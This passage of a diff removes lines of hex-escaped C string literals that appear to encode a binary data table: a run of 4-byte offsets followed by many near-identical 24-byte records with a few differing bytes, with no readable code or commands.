-"\x44\x6a\x00\x00\x4e\x6a\x00\x00\x5d\x6a\x00\x00\x67\x6a\x00\x00"
-"\x6b\x6a\x00\x00\x6c\x6a\x00\x00\x6f\x6a\x00\x00\x75\x6a\x00\x00"
-"\x80\x6a\x00\x00\x8f\x6a\x00\x00\x96\x6a\x00\x00\x9e\x6a\x00\x00"
-"\x9f\x6a\x00\x00\xa2\x6a\x00\x00\xa8\x6a\x00\x00\xb6\x6a\x00\x00"
-"\xc5\x6a\x00\x00\xd4\x6a\x00\x00\xe1\x6a\x00\x00\xe2\x6a\x00\x00"
-"\xe5\x6a\x00\x00\xea\x6a\x00\x00\xf4\x6a\x00\x00\x03\x6b\x00\x00"
-"\x14\x6b\x00\x00\x1c\x6b\x00\x00\x1d\x6b\x00\x00\x20\x6b\x00\x00"
-"\x25\x6b\x00\x00\x31\x6b\x00\x00\x40\x6b\x00\x00\x48\x6b\x00\x00"
-"\x4c\x6b\x00\x00\x4d\x6b\x00\x00\x50\x6b\x00\x00\x55\x6b\x00\x00"
-"\x61\x6b\x00\x00\x70\x6b\x00\x00\x78\x6b\x00\x00\x7c\x6b\x00\x00"
-"\x7d\x6b\x00\x00\x80\x6b\x00\x00\x85\x6b\x00\x00\x90\x6b\x00\x00"
-"\x9f\x6b\x00\x00\xa5\x6b\x00\x00\xa9\x6b\x00\x00\xaa\x6b\x00\x00"
-"\xad\x6b\x00\x00\xb2\x6b\x00\x00\xbe\x6b\x00\x00\xcd\x6b\x00\x00"
-"\xe1\x6b\x00\x00\xe5\x6b\x00\x00\xe6\x6b\x00\x00\xe9\x6b\x00\x00"
-"\xee\x6b\x00\x00\xf8\x6b\x00\x00\x07\x6c\x00\x00\x11\x6c\x00\x00"
-"\x15\x6c\x00\x00\x16\x6c\x00\x00\x19\x6c\x00\x00\x20\x6c\x00\x00"
-"\x31\x6c\x00\x00\x40\x6c\x00\x00\x47\x6c\x00\x00\x4b\x6c\x00\x00"
-"\x4c\x6c\x00\x00\x4f\x6c\x00\x00\x54\x6c\x00\x00\x66\x6c\x00\x00"
-"\x67\x6c\x00\x00\x6e\x6c\x00\x00\x7e\x6c\x00\x00\x7f\x6c\x00\x00"
-"\x82\x6c\x00\x00\x87\x6c\x00\x00\x92\x6c\x00\x00\xa1\x6c\x00\x00"
-"\xa5\x6c\x00\x00\xb3\x6c\x00\x00\xb4\x6c\x00\x00\xb7\x6c\x00\x00"
-"\xbb\x6c\x00\x00\xc7\x6c\x00\x00\xd6\x6c\x00\x00\xe7\x6c\x00\x00"
-"\xef\x6c\x00\x00\xf0\x6c\x00\x00\xf3\x6c\x00\x00\xf8\x6c\x00\x00"
-"\x01\x6d\x00\x00\x10\x6d\x00\x00\x1c\x6d\x00\x00\x20\x6d\x00\x00"
-"\x21\x6d\x00\x00\x24\x6d\x00\x00\x28\x6d\x00\x00\x33\x6d\x00\x00"
-"\x42\x6d\x00\x00\x54\x6d\x00\x00\x58\x6d\x00\x00\x59\x6d\x00\x00"
-"\x5c\x6d\x00\x00\x62\x6d\x00\x00\x6b\x6d\x00\x00\x7a\x6d\x00\x00"
-"\x82\x6d\x00\x00\x8a\x6d\x00\x00\x8b\x6d\x00\x00\x8e\x6d\x00\x00"
-"\x93\x6d\x00\x00\x9d\x6d\x00\x00\xac\x6d\x00\x00\xbb\x6d\x00\x00"
-"\xbf\x6d\x00\x00\xc0\x6d\x00\x00\xc3\x6d\x00\x00\xc7\x6d\x00\x00"
-"\xd9\x6d\x00\x00\xe8\x6d\x00\x00\xee\x6d\x00\x00\xfe\x6d\x00\x00"
-"\xff\x6d\x00\x00\x02\x6e\x00\x00\x07\x6e\x00\x00\x19\x6e\x00\x00"
-"\x28\x6e\x00\x00\x32\x6e\x00\x00\x36\x6e\x00\x00\x37\x6e\x00\x00"
-"\x3a\x6e\x00\x00\x3f\x6e\x00\x00\x48\x6e\x00\x00\x57\x6e\x00\x00"
-"\x60\x6e\x00\x00\x64\x6e\x00\x00\x65\x6e\x00\x00\x68\x6e\x00\x00"
-"\x6d\x6e\x00\x00\x79\x6e\x00\x00\x88\x6e\x00\x00\x90\x6e\x00\x00"
-"\x94\x6e\x00\x00\x95\x6e\x00\x00\x98\x6e\x00\x00\x9e\x6e\x00\x00"
-"\xa9\x6e\x00\x00\xb8\x6e\x00\x00\xc4\x6e\x00\x00\xc9\x6e\x00\x00"
-"\xca\x6e\x00\x00\xcd\x6e\x00\x00\xd2\x6e\x00\x00\xdd\x6e\x00\x00"
-"\xec\x6e\x00\x00\xf5\x6e\x00\x00\x03\x6f\x00\x00\x04\x6f\x00\x00"
-"\x07\x6f\x00\x00\x0b\x6f\x00\x00\x15\x6f\x00\x00\x24\x6f\x00\x00"
-"\x2e\x6f\x00\x00\x3c\x6f\x00\x00\x3d\x6f\x00\x00\x3e\x6f\x00\x00"
-"\xc8\x6f\x00\x00\xac\x70\x00\x00\x4b\x71\x00\x00\x6f\x71\x00\x00"
-"\xdd\x71\x00\x00\xde\x71\x00\x00\x1f\x72\x00\x00\x63\x72\x00\x00"
-"\x64\x72\x00\x00\x92\x72\x00\x00\x58\x73\x00\x00\x59\x73\x00\x00"
-"\x8a\x73\x00\x00\xb1\x73\x00\x00\xdf\x73\x00\x00\xf0\x73\x00\x00"
-"\x06\x74\x00\x00\x17\x74\x00\x00\x18\x74\x00\x00\x1b\x74\x00\x00"
-"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x7d\x00\x80\x00\x00"
-"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x00\x00\x47\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
-"\x00\x30\x00\x00\xeb\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\xe0\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa9\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
